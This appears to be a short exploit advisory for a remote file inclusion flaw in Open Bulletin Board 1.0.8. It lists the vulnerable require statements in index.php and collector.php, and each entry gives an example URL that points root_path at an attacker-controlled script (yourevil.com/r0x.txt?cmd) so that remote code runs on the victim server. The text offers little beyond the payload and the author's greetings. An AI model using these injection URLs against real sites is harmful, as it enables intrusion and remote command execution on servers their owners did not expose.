Open Bulletin Board <= 1.0.8 (root_path) File Include Vulnerability

±-------------------------------------------------------------------
+

• Open Bulletin Board 1.0.8 ; Multiple Remote File Include Vulnerabilities

±------------------------------------------------------------------
+

• Affected Software .: Software
• Version …: Open Bulletin Board 1.0.8
• Venedor …: http://www.openbb.com
• Class …: Remote File Inclusion
• Risk …: high (Remote File Execution)
• Discovered by …: Eddy_BAck0o
• Contact …: l0x3[at]hotmail.com

±-------------------------------------------------------------------
±-------------------------------------------------------------------

• ./index Directory …
  ~ [index.php]

+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

• require $root_path . "base.php"; <— 30 - 380
• require $root_path . "base.php"; <— 46 - 380
  +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
• Ex –>
  http://www.victom.com/index.php?root_path=http://yourevil.com/r0x.txt?cmd

±------------------------------------------------------------------
+
~ [collector.php]
+
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

• root_path = "./"; <— 24 - 194
• require $root_path . "base.php"; <— 159 - 194
  +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
• Ex –>
  http://www.victom.com/index.php?root_path=http://yourevil.com/r0x.txt?cmd

±------------------------------------------------------------------

• Greetz LEzr.com/vB Member's ; My Team ; My Best [ MoHaJaLi ; Qptan ] ;…
  ±-------------------------------------------------------------------
  ±-------------------------------------------------------------------